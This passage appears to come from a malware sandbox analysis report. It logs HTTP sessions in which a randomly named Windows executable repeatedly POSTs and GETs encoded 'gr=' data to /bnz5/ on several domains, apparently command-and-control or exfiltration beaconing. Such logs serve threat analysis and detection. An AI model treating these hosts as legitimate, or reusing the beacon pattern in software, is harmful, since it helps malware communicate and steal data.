                                                                                                      14 | 192.168.2.5 | 49733 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:26.544164896 CEST | 735 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.mytemplotech.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.mytemplotech.com
                                                                                                      Referer: http://www.mytemplotech.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=718vMEZ/YzlaMHpHgTOVZRL02hoklZOkQG/vLSY017tIDdhRlIA+Wp/JbTldoUM7zksBZI3j+xjJbDi1o8BciDycGaMiPYQsN3XQoOlkP5QDrzLAcWh1B5r7DmzHl+DwXY0tbgG/wCmqwgVCMM7UCbx+d+Go2NZnYrGvKfTJSmXEXCr2A1ZQWmfY2BMoY0PxbK16y5mMxni4bdyV1PATwiF/x2ng
                                                                                                      Apr 16, 2024 12:00:26.756022930 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:26 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      15 | 192.168.2.5 | 49734 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:29.276652098 CEST | 1752 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.mytemplotech.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.mytemplotech.com
                                                                                                      Referer: http://www.mytemplotech.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:29.487752914 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:29 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      16 | 192.168.2.5 | 49735 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:32.010354042 CEST | 452 | OUT | GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=23UPPxRjGSNUJTgmtj2qEyLz/ntkvqKRRFHtLj5W9bo9CLdZgto2DYnNUhYakwcl0jYhNZjG9CPBZRuAkcQvlwifYrEIa7IdBg/GlOURZYl7vwvnI0pSC8vNdE3Ml+j1JA== HTTP/1.1
                                                                                                      Host: www.mytemplotech.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:32.226129055 CEST | 107 | IN | HTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:00:32 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      17 | 192.168.2.5 | 49736 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:37.591880083 CEST | 709 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.othlastore.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.othlastore.com
                                                                                                      Referer: http://www.othlastore.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=+fYIQLsqcSIeESjR83zRJWc4R+HnH5gbgdmju2llC5LO3FfhvHc7iyUoniVIgcJv4c6K84bAoNTSxc5UuyMSvf3qBwalUi7me+KVjPy6avlU0W8uarz+bKouX/vOtvcWf+9+cuz/RQyjhaMxvo0x/7SGI9jM62H82qxHBmsrUVqlYxWhcLkqL/EUocJTYpC3bg4pK5Y=
                                                                                                      Apr 16, 2024 12:00:37.803324938 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:37 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      18 | 192.168.2.5 | 49737 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:40.327210903 CEST | 729 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.othlastore.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.othlastore.com
                                                                                                      Referer: http://www.othlastore.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=+fYIQLsqcSIeLSTRw0bRP2c3eeHnNZgXgd6ju3goFP7OwgjhuDI7hyUo/SVJkcIj4c2o88bAoNvSxZFUtB0RpP3oVAanLy7me+KVjPnyavNU0GMucKz9RqotefvOpvddf+9ccsGQRSKjhb8xu6M207SAGdiI0VuIw495cXEuAUjddH7LGpsCYfos4PBkJZjeBDoZUuMUGTcjrWCkqsCxWJ/UqaTz
                                                                                                      Apr 16, 2024 12:00:40.549858093 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:40 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      19 | 192.168.2.5 | 49738 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:43.058501959 CEST | 1746 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.othlastore.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.othlastore.com
                                                                                                      Referer: http://www.othlastore.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=+fYIQLsqcSIeLSTRw0bRP2c3eeHnNZgXgd6ju3goFMbOwSbhvkk7gyUohiVMkcJ54cus88f2oIjSz/RUo0YRnP3oKQakUi6ke+aRjP3yavNU0Ekufbz9eKouX/vCtvc6f+khcsDvQjqjg7sxtPY297SCBdiu0VyXw4gKcXxBATndfBWTebc5KeJO8dt/ftzicCI3ZtgOGXQR9xWXm4DIBtfcodutDacMA35PmX+leUT+MZr5tWCxHQmmK3wdd/FonQJz79W0gxAuB73mN2mM6PeaSFHy1pyU0jM9vZYRDpZ2TznHZuNJv2ntGhG+ylqsWNT9j0l6bZeflvX88OD/Jlf5x4xVpxLunA+wDvijmHb1JoDrKXTz81E2tbpVGy6sWsqcXarVzxNmK5VPPigtLsNszXp9467LGfKZr665nY6os1efHYX2kGebo5q6LFZCWt0ECcwPGZl35GbUyf9sP0fsH2qaoce4VnnDfx6iX4l1kQ3Iz4rvOk43ZlC9BEF+HxsCYKBnxnPwjl7DGiwRVVQ7hBQsynojtbQRaso+UCkQTyfphy5HYfZ/8uw4I1Rt8L5Hghk15aV6HHebYFfRU0zhWXc6jIxMGHM0b0vqNMK1NjbMCuFwba/xa/yQjiBDs7OYifFqle/ObeU/XJAe+ztiiFSR3Dnhoh1TorSrfQp0aXhNqmNcjA1iyzX2qgnnI1PC/jaIgYQKYJ1mSXEgQ/2WasOyRBS4HWSaFSrIJg30NUURj29rNiqGF+bun87TT2Ea3lVj0S8TtFMcXhUtmWfxzjqlWPirh6rC+AzB5ilC0OL/KPQEAhJFTYT4s0NKTLWfN0v6vl17Gm+npgFIy6IBHMaoN/VFYhmRQMy2iOxFr8mMDuagNiCmVKJBRUI5OB21Yn5KAJo4Pb7wcZb/2CJYS8yQVf+0VSUiKwD+E6U86w5XTSI76AQhHZA1E+1pTwU+n/GqxZ1S2KDz2sH/mm/j+XezioXVOlULsg0her4EjAzJjmZKIjza+vOkGkFI6NSLTZBrzNgz3jNQnDWDQumOWPbpnnBA9HyNGvSSQhAOSujy2E+TnWnZwghKmvmGbZXxyOFcP1aeyIDdS/VeNYKKP5cA3BgFyA6fOHjI1xNbsqfIdTXK2s/bJWjBMSBz13MX4T2gDz2drun9wwkyCnew4rS6WZw+MXg5EcO4nSYmZhtiou0XvK5vCrU50tgZz7uyHhL07xSxjsBXhg==
                                                                                                      Apr 16, 2024 12:00:43.270207882 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:00:43 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      20 | 192.168.2.5 | 49739 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:45.798046112 CEST | 450 | OUT | GET /bnz5/?gr=zdwoT+oWWlgyDxCB5HfbKl0ceeCoMM1WsfXRj0lrAfPT+1DsmzcZqVZ0gwFwp9Re8dyKn5b7kYDBw8FcuEN9m4nkKjfCAjjkfqKhmamnNO4NqnkVPKDFVPgTCNPXruJSGA==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.othlastore.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:46.013204098 CEST | 107 | IN | HTTP/1.1 436
                                                                                                      date: Tue, 16 Apr 2024 10:00:45 GMT
                                                                                                      content-length: 0
                                                                                                      server: NginX
                                                                                                      connection: close


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      21 | 192.168.2.5 | 49740 | 75.2.60.5 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:51.277666092 CEST | 718 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.book-of-degen.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.book-of-degen.xyz
                                                                                                      Referer: http://www.book-of-degen.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=w20r5kSwqCsfoWHajrku9nzicy2CpRrYUYFuPgDU4hhqp+TZ3qc1tREIsibOSlF+GiHb0ZjwrrBE2u9wCGc5FTqtuOPjIKIA67ItzilwOtU8QFQx6aY189MXrrJj3hK6j1zMzs+AVKbWucXsnF6zZv0kD7OIroXhJnffd8msNwWGo1Q3PMG5yoHWDCe6v5OAs02dPbQ=
                                                                                                      Apr 16, 2024 12:00:51.419419050 CEST | 1228 | IN | HTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 16 Apr 2024 10:00:51 GMT
                                                                                                      Server: Netlify
                                                                                                      X-Nf-Request-Id: 01HVK5M9C7DRX0A3PMYF6BG4XB
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Ascii: 9d8<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width:500px;padding:24px;
                                                                                                      Apr 16, 2024 12:00:51.419481039 CEST | 1228 | IN
                                                                                                      Data Ascii: background:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#00706
                                                                                                      Apr 16, 2024 12:00:51.419518948 CEST | 563 | IN
                                                                                                      Data Ascii: -deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      22 | 192.168.2.5 | 49741 | 75.2.60.5 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:53.910963058 CEST | 738 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.book-of-degen.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.book-of-degen.xyz
                                                                                                      Referer: http://www.book-of-degen.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=w20r5kSwqCsf6lvakMIu1nzhTS2CgxqTUY5uPhGL4yFqqb3Z0uw1uREIkCbXPVETGibi0dnwrrVE2rZwCRI6FDqvjuPhGqIA67ItzmJKOtc8X1gx77Yy0dMY7bJjzhK+j1yjzo/bVITWudnsnU6wTv0iH7OfvqrlEG3xV/b4YRSmgj9dVuORhIruTRWN+Jvp2XmtRMEQiTf8AKj+mx9fy9cX2YkH
                                                                                                      Apr 16, 2024 12:00:54.031459093 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 16 Apr 2024 10:00:53 GMT
                                                                                                      Server: Netlify
                                                                                                      X-Nf-Request-Id: 01HVK5MBYG15N8ZTVMHJ1MWWT5
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Ascii: 9d8<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width:500px;padding:24px;background:#fff;color:#0e1e25;border-radius:8px;box-shadow:0
                                                                                                      Apr 16, 2024 12:00:54.031506062 CEST | 1167 | IN
                                                                                                      Data Ascii: 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-type{margin-bottom:0}.inline-code{display:inline-
                                                                                                      Apr 16, 2024 12:00:54.031541109 CEST | 563 | IN
                                                                                                      Data Ascii: -deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      23 | 192.168.2.5 | 49742 | 75.2.60.5 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:00:56.544807911 CEST | 1755 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.book-of-degen.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.book-of-degen.xyz
                                                                                                      Referer: http://www.book-of-degen.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:56.665306091 CEST  1228  IN  HTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 16 Apr 2024 10:00:56 GMT
                                                                                                      Server: Netlify
                                                                                                      X-Nf-Request-Id: 01HVK5MEGTM54BM3C6NFASF488
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Ascii: 9d8<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width:500px;padding:24px;
                                                                                                      Apr 16, 2024 12:00:56.665348053 CEST  1228  IN
                                                                                                      Data Ascii: background:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#00706
                                                                                                      Apr 16, 2024 12:00:56.665383101 CEST  563  IN
                                                                                                      Data Ascii: -deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-


                                                                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                      24          192.168.2.5  49743        75.2.60.5       80                2940  C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                      Apr 16, 2024 12:00:59.169714928 CEST  453  OUT  GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=90cL6Q+hnzVn1nW1iqhU1H7cWV3fvz6SaIERCijRkAMfp+TQya0GlzYPpQzULEJqUDrLh9Kv8LQV8OdLSWJ6ERPfs+zhKb8B6PZEz280PNZ5UlofhaQwyuwHrpNW2TXV5g== HTTP/1.1
                                                                                                      Host: www.book-of-degen.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:00:59.290175915 CEST  1289  IN  HTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 16 Apr 2024 10:00:59 GMT
                                                                                                      Server: Netlify
                                                                                                      X-Nf-Request-Id: 01HVK5MH2VHJ14N108E9M8MFJM
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Ascii: 9d8<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width:500px;padding:24px;background:#fff;color:#0e1e25;border-radius:8px;box-shadow:0
                                                                                                      Apr 16, 2024 12:00:59.290239096 CEST  1289  IN
